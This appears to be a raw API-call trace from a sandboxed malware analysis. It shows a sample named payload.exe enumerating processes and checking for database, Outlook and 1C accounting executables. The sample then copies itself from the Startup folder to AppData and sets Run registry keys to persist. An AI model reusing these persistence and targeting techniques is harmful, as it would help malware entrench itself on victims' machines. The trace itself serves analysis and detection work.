[0260.559] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.559] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.559] lstrlenW (lpString="svchost.exe") returned 11 [0260.559] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.560] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.560] lstrlenW (lpString="dllhost.exe") returned 11 [0260.560] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0260.560] lstrlenW (lpString="userinit.exe") returned 12 [0260.560] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.560] lstrlenW (lpString="dwm.exe") returned 7 [0260.560] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.561] lstrlenW (lpString="explorer.exe") returned 12 [0260.561] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.561] lstrlenW (lpString="spoolsv.exe") returned 11 [0260.561] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.561] lstrlenW (lpString="taskhost.exe") returned 12 [0260.561] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.561] lstrlenW (lpString="svchost.exe") returned 11 [0260.561] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="runonce.exe")) returned 1 [0260.562] lstrlenW (lpString="runonce.exe") returned 11 [0260.562] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0260.562] lstrlenW (lpString="payload.exe") returned 11 [0260.562] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.562] lstrlenW (lpString="dllhost.exe") returned 11 [0260.562] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0260.562] CloseHandle (hObject=0xe0) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559520 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559568 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5595b0 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5595d0 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559618 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x554d48 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559480 | out: hHeap=0x520000) returned 1 [0260.562] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5594b8 | out: hHeap=0x520000) returned 1 [0260.563] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5345f0 | out: hHeap=0x520000) returned 1 [0260.563] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534618 | out: hHeap=0x520000) returned 1 [0260.563] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559500 | out: hHeap=0x520000) returned 1 [0260.563] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534640 | out: hHeap=0x520000) returned 1 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x55eeb8 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x56eec0 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x534640 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534640, Size=0x40) returned 0x55abf8 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x534640 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x534618 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x5345f0 [0260.563] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x55ac40 [0260.563] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x56eec0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe")) returned 0x67 [0260.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x57eec8 [0260.564] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x58eed0 [0260.564] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x5345f0 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5345f0, Size=0x40) returned 0x55ac88 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac88, Size=0x80) returned 0x559500 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559500, Size=0x100) returned 0x55be10 [0260.564] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.564] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55be10 | out: hHeap=0x520000) returned 1 [0260.564] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\payload.exe", lpDst=0x57eec8, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\payload.exe") returned 0x20 [0260.564] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58eed0 | out: hHeap=0x520000) returned 1 [0260.564] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57eec8 | out: hHeap=0x520000) returned 1 [0260.564] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x2080020 [0260.564] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x5345f0 [0260.564] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.564] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559bc0 [0260.565] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.565] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.565] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0260.565] lstrlenW (lpString="kernel32.dll") returned 12 [0260.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5345f0 | out: hHeap=0x520000) returned 1 [0260.565] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0260.565] CreateFileW (lpFileName="C:\\Windows\\System32\\payload.exe" (normalized: "c:\\windows\\system32\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0260.567] CloseHandle (hObject=0xe0) returned 1 [0260.567] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.567] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559bc0 [0260.567] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.567] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559b70 [0260.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.567] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.567] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.567] lstrlenW (lpString="kernel32.dll") returned 12 [0260.567] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.567] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.567] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.567] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x520000) returned 1 [0260.567] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x57eec8 [0260.567] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x58eed0 [0260.567] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.567] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559bc0 [0260.567] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559bc0, Size=0x40) returned 0x55ac88 [0260.567] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac88, Size=0x80) returned 0x59eef0 [0260.568] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x55be10 [0260.568] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.568] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55be10 | out: hHeap=0x520000) returned 1 [0260.568] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\payload.exe", lpDst=0x57eec8, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe") returned 0x3a [0260.568] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58eed0 | out: hHeap=0x520000) returned 1 [0260.568] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57eec8 | out: hHeap=0x520000) returned 1 [0260.568] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x2080020 [0260.568] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.568] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559bc0 [0260.568] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.568] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559b70 [0260.568] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.568] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.568] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.568] lstrlenW (lpString="kernel32.dll") returned 12 [0260.568] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.568] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.568] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0260.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0260.826] ReadFile (in: hFile=0xe0, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0260.841] WriteFile (in: hFile=0xe4, lpBuffer=0x2080020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0260.843] ReadFile (in: hFile=0xe0, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0260.843] CloseHandle (hObject=0xe4) returned 1 [0260.843] CloseHandle (hObject=0xe0) returned 1 [0260.843] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.843] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559b70 [0260.843] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.843] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559bc0 [0260.843] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.843] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.843] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.843] lstrlenW (lpString="kernel32.dll") returned 12 [0260.844] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.844] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.844] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.844] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x520000) returned 1 [0260.847] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d48 [0260.847] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d48, Size=0x20) returned 0x559b70 [0260.847] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559b70, Size=0x40) returned 0x55ac88 [0260.847] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac88, Size=0x80) returned 0x59eef0 [0260.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe") returned 57 [0260.848] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0260.848] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5c) returned 0x55c0f8 [0260.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0260.848] RegSetValueExW (hKey=0xe0, lpValueName="payload.exe", Reserved=0x0, dwType=0x1, lpData=0x55eeb8, cbData=0x72) returned 0x5 [0260.848] RegCloseKey (hKey=0xe0) returned 0x0 [0260.848] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55c0f8 | out: hHeap=0x520000) returned 1 [0260.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe") returned 57 [0260.848] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0260.848] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5c) returned 0x55c0f8 [0260.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe4) returned 0x0 [0260.848] RegSetValueExW (in: hKey=0xe4, lpValueName="payload.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe", cbData=0x72 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\payload.exe") returned 0x0 [0260.848] RegCloseKey (hKey=0xe4) returned 0x0 [0260.848] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55c0f8 | out: hHeap=0x520000) returned 1 [0260.848] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0260.848] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59eef0 | out: hHeap=0x520000) returned 1 [0260.848] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x57eec8 [0260.848] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x58eed0 [0260.848] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.849] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559b70 [0260.849] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559b70, Size=0x40) returned 0x55ac88 [0260.849] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac88, Size=0x80) returned 0x59eef0 [0260.849] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x55be10 [0260.849] lstrlenW (lpString="") returned 0 [0260.849] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.849] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8c) returned 0x55bf18 [0260.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0260.849] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x58eed0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x58eed0*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0260.849] RegCloseKey (hKey=0xe4) returned 0x0 [0260.849] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55bf18 | out: hHeap=0x520000) returned 1 [0260.849] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.849] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8c) returned 0x55bf18 [0260.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0260.849] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x58eed0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0260.849] RegCloseKey (hKey=0xe4) returned 0x0 [0260.849] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55bf18 | out: hHeap=0x520000) returned 1 [0260.849] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0260.849] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.849] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55be10 | out: hHeap=0x520000) returned 1 [0260.849] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe", lpDst=0x57eec8, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe") returned 0x68 [0260.849] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58eed0 | out: hHeap=0x520000) returned 1 [0260.849] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57eec8 | out: hHeap=0x520000) returned 1 [0260.849] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x2080020 [0260.849] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.850] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559b70 [0260.850] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.850] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559bc0 [0260.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.850] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.850] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.850] lstrlenW (lpString="kernel32.dll") returned 12 [0260.850] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.850] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.850] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0260.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0260.850] CloseHandle (hObject=0xe4) returned 1 [0260.850] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.850] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559bc0 [0260.850] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.850] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559b70 [0260.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.850] 